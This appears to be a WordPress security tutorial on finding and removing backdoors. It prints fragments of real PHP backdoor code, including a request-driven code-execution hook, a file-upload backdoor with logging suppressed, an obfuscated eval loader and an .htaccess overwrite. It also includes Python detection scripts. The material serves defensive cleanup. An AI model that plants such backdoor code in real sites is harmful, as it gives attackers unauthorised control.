Finding and Removing Backdoors
The WordPress Security Learning Center

3.2: Finding and Removing Backdoors

Advanced
Updated October 21, 2020

What is a backdoor?

A malicious backdoor is code that allows unauthorized and often unrestricted access to a compromised site. Backdoors give attackers access to all of the files within the hosting account. A backdoor can look like normal PHP code, or it can be obfuscated (intentionally obscured to make the code ambiguous) and hidden. A backdoor can be inserted into a valid file as only one short line of code that looks rather innocent. Or, a backdoor can be a standalone file. Backdoor access allows an attacker to place any malicious code on the site. Backdoors are often found in conjunction with other malware.

Determining if your site is infected

Backdoors can be difficult to find as they are often obfuscated code. Usually if there is one backdoor, there are others that may or may not look the same. Sometimes backdoors are unsecured maintenance scripts accidentally left behind after authorized site maintenance.

A site owner is often unaware that backdoors exist on the site. However, if any other malware is found on the site, it is probable that many backdoor files or code injections also exist, allowing an attacker to gain entry to the site.

Finding and Removing Backdoors

Removal of backdoors requires an analysis of the site code. Backdoors are typically found within PHP files on the web server. They can either be inserted into your core, plugin, or theme files, or they can be a standalone file. They can be found in any publicly accessible directory on your server that can be easily accessed by the person who placed it.

To remove the backdoor, first create a backup of site files and database. It is helpful to review your raw HTTP access log files, as backdoors are typically used through an HTTP POST request to a file.

A compromised administrative account can allow the attacker to use the core theme editor to add a backdoor to a theme’s 404 file. In this way, every request to your site that generates a 404 error message serves up a backdoor that can be used by anyone who knows that it is there.
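The log review described above can be scripted. This is an added example, not code from the original page: it reads access log lines in Combined Log Format and counts POST requests that go directly to a PHP file outside a short allowlist, or that are answered with a 404 (the pattern a backdoored theme 404 file would leave). The allowlist, the function name and the sample lines are assumptions made for the illustration.

```python
import re
from collections import Counter

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Assumption: PHP endpoints that normally receive POSTs on a stock WordPress
# site. Extend it for your own plugins and for admin activity under /wp-admin/.
EXPECTED_POST = {
    "/wp-login.php", "/wp-cron.php", "/xmlrpc.php",
    "/wp-comments-post.php", "/wp-admin/admin-ajax.php",
}

def suspicious_posts(lines):
    """Count POSTs per (path, status, ip) that deserve a manual look."""
    hits = Counter()
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a Combined Log Format line
        ip, method, target, status = match.groups()
        if method != "POST":
            continue
        path = target.split("?", 1)[0]  # ignore the query string
        direct_php = path.endswith(".php") and path not in EXPECTED_POST
        # A POST answered with 404 is consistent with a backdoored 404 template.
        if direct_php or status == "404":
            hits[(path, status, ip)] += 1
    return hits

# Constructed sample log lines (documentation IP ranges, invented paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Oct/2020:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [21/Oct/2020:10:02:11 +0000] "POST /wp-content/uploads/2020/10/media.php HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.23 - - [21/Oct/2020:10:02:15 +0000] "POST /wp-content/uploads/2020/10/media.php HTTP/1.1" 200 9381 "-" "-"',
    '192.0.2.44 - - [21/Oct/2020:10:05:40 +0000] "GET /wp-includes/xml.php HTTP/1.1" 200 0 "-" "-"',
    '198.51.100.23 - - [21/Oct/2020:10:07:02 +0000] "POST /no-such-page HTTP/1.1" 404 7200 "-" "-"',
    '203.0.113.7 - - [21/Oct/2020:10:09:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 47 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for (path, status, ip), count in suspicious_posts(SAMPLE_LOG).most_common():
        print(f"{count:3d}  {status}  {ip:15s}  {path}")
```

Each reported path is a file to open and read, and the source address and timestamps give a starting point for tracing what else was requested.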

Removal of the backdoor requires finding the code that allows for unauthorized access and removing that code. It requires an understanding of the code that operates your site.

Rogue File Backdoors

Here are some samples of backdoors found as rogue files, or files that are not part of the core plugin, theme, or content management system. They have names that seem innocent or similar to other core files such as xml.php, media.php, plugin.php, etc. and they can be placed anywhere on the site. Code in a rogue file might start like these:

$t43="l/T6\\:aAcNLn#?rP}1\rG_ -s`SZ\$58t\n7E{.*]ixy3h,COKR2dW[0!U\tuQIHf4bYm>wFz<=DqV@&(BjX'~|ge%p+oMJv^);\"k9";$GLOBALS['ofmhl60'] = ${$t43[20].$t43

It is important to not only look for extraneous files on your site, but to examine every file.

Backdoor Plugins and Themes

If an administrative account is compromised, attackers often use the plugin or theme upload capabilities of a site to add backdoors.

If a plugin is added with backdoors, it may or may not appear on your plugin administration page. Malicious plugin files are often hidden from view and are only visible in the file system through your file manager or FTP. They are often named things that seem helpful, such as:

  • WordPress Support
  • Login Wall
  • WP zipp
  • WP-Base-SEO

Plugins may be installed that look like normal plugins, named something like Akismet3 along with some older valid Akismet files but with backdoor code contained within the uploaded files.

Theme files may also be added containing backdoors. The WordPress Sketch theme was for a time a popular malware-laden theme uploaded with numerous backdoor files within it. The theme might show up in the theme administration page, or it may be listed at the bottom of that page as an inactive theme because it is missing some files.

If you have themes or plugins that you do not recognize, remove them. But you will also need to review the rest of your files. Often one backdoor is a means to add more backdoors throughout the site, including editing core files to add backdoor functionality within them.

Core File Backdoor Inserts

Core files of your Content Management System can have backdoors inserted into them. They can be added to the beginning of the file, the end of the file, and in some instances interspersed within valid code of the core file itself.

This code, or code like it, is often added to the top of a valid page.

if (isset($_REQUEST['FILE'])){
$_FILE =$_REQUEST['92422e6d']('$_',$_REQUEST['FILE'].'($_);');
$_FILE(stripslashes($_REQUEST['HOST']));
}

Here is another example.

@ini_set('display_errors','off'); 
@ini_set('log_errors',0); 
@ini_set('error_log',NULL); error_reporting(0); @ini_set('set_time_limit',0); 
ignore_user_abort(true); 
if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {
@ini_set('upload_max_filesize','1000000'); 
$size=$_POST['size']; 
$open_image=$_FILES['img']['name']; $open_image_tmp=$_FILES['img']['tmp_name']; 
$image_tmp=$size.$open_image; @move_uploaded_file($open_image_tmp,$image_tmp); 

Other backdoors are highly obfuscated and may start like this.

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\

Often there will be references to FilesMan somewhere within the backdoor file.

$default_action = "FilesMan";

Sometimes a backdoor writes malicious content to a specific file; in this case, it writes redirects to the .htaccess file.

$htaccess = str_replace( "#####INCLUDE#####", $ht2_code, $ht1_code );
@unlink( "[site path]/public_html/.htaccess" );
$fp = fopen( "[site path]/public_html/.htaccess", "w" );
fputs( $fp, $htaccess );
fclose( $fp );
@chmod( "[site path]/public_html/.htaccess", $chmod );
touch( "[site path]/public_html/.htaccess", $time );
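The samples in this section share a few recognizable traits, which makes a first-pass scan of every PHP file practical. This is an added example, not code from the original page: the rule names and regular expressions are heuristics written for this illustration from the snippets shown above.

```python
import os
import re

# Heuristic rules built from the samples on this page; names are this example's own.
RULES = {
    "request-supplied-function": re.compile(
        r"\$_(?:REQUEST|POST|GET|COOKIE)\s*\[[^\]]+\]\s*\("),
    "preg_replace-e-modifier": re.compile(
        r"preg_replace\s*\(\s*([\"'])/.*?/[a-zA-Z]*e[a-zA-Z]*\1"),
    "hex-escaped-string": re.compile(r"(?:\\x[0-9A-Fa-f]{2}){8,}"),
    "FilesMan-marker": re.compile(r"FilesMan"),
    "htaccess-overwrite": re.compile(
        r"fopen\s*\([^)]*\.htaccess[^)]*,\s*[\"']w"),
}

def scan_text(text):
    """Return sorted (line_number, rule_name) pairs for every rule hit in text."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((number, name))
    return sorted(hits)

def scan_tree(root):
    """Scan every .php file under root; return {path: hits} for files with hits."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for filename in files:
            if not filename.lower().endswith(".php"):
                continue
            path = os.path.join(folder, filename)
            with open(path, encoding="utf-8", errors="replace") as handle:
                hits = scan_text(handle.read())
            if hits:
                report[path] = hits
    return report

# Constructed sample: one benign line, then lines quoted from the samples above.
SAMPLE = "\n".join([
    r"<?php echo get_option('blogname');",
    r"$_FILE =$_REQUEST['92422e6d']('$_',$_REQUEST['FILE'].'($_);');",
    r'preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61',
    r'$default_action = "FilesMan";',
    r'$fp = fopen( "[site path]/public_html/.htaccess", "w" );',
])
```

Hits are leads for manual review, not verdicts: legitimate caching and security plugins also rewrite .htaccess, and a file with no hits can still contain a backdoor.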

Unsecured Maintenance Scripts

Maintenance scripts are sometimes left behind after maintenance is performed. These scripts are later discovered by attackers and exploited. One popular maintenance script is searchreplacedb2.php, which allows unrestricted access to the site database.

Looking Beyond the Backdoor

Backdoors are most often used as a means to an end in conjunction with other malicious pages. If you have backdoors, you most likely have other malware on your site such as spam pages, spam links, phishing operations or malicious redirects.

No matter what type of backdoor you have found on your site, the big question is: how did it get there? There may be other types of malware or security vulnerabilities on your site that allowed an attacker to gain access to the site. Attackers often place multiple backdoors, some similar, some different, so a review of the entire site is important.

If, after reading this guide, you are unsure how to remove backdoors, are uncertain whether you have removed all of them, or are looking for more answers as to how the code was placed on your site, get help.
